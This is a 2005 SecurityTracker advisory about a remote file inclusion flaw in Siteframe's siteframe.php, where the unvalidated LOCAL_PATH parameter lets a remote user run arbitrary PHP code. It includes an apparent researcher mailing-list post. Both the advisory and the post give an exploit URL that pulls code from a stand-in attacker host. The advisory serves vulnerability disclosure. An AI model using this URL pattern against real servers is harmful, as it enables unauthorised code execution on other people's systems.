Siteframe Include File Flaw in 'siteframe.php' Lets Remote Users Execute Arbitrary Commands
|
SecurityTracker Alert ID: 1014150
|
SecurityTracker URL: http://securitytracker.com/id?1014150
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 9 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Description: PRI[l from MOROCCO reported a vulnerability in Siteframe. A remote user can execute arbitrary commands on the target system.
The 'siteframe.php' script includes files relative to the user-supplied 'LOCAL_PATH' parameter without properly validating the input.
A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote
location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration
exploit URL is provided:
http://[target]/siteframe/siteframe.php?LOCAL_PATH=http://[attacker]/PRI[ll
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.siteframe.org/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "the_r00t theroot" <the_r00t3r@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 09 Jun 2005 01:21:19 +0000
From: "the_r00t theroot" <the_r00t3r@hotmail.com>
Subject: siteframe file bug in siteframe.php let's Remote Users Execute Arbitrary Command
|
Title : siteframe file bug in siteframe.php let's Remote Users Execute
Arbitrary Command
Date : 09/06/2005
Impact: Remote code execution
Risk Level: High
http://victim.com/siteframe/siteframe.php?LOCAL_PATH=http://attacker.com/PRI[ll
..::Credits for this vulnerability goes to PRI[l from MOROCCO::..
greetz : Arabian FighterZ - #whackerz - Mianwalian - mani1 - ch33ta - and
all friends :D
..::PROUD TO BE Moroccan::..
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
|
|